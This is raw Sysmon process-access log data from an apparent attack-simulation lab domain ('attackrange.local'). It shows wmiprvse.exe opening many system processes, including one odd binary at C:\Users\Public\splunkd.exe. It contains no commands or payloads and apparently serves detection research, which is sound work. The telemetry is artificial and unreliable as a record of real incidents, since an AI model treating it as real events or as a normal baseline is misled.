15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 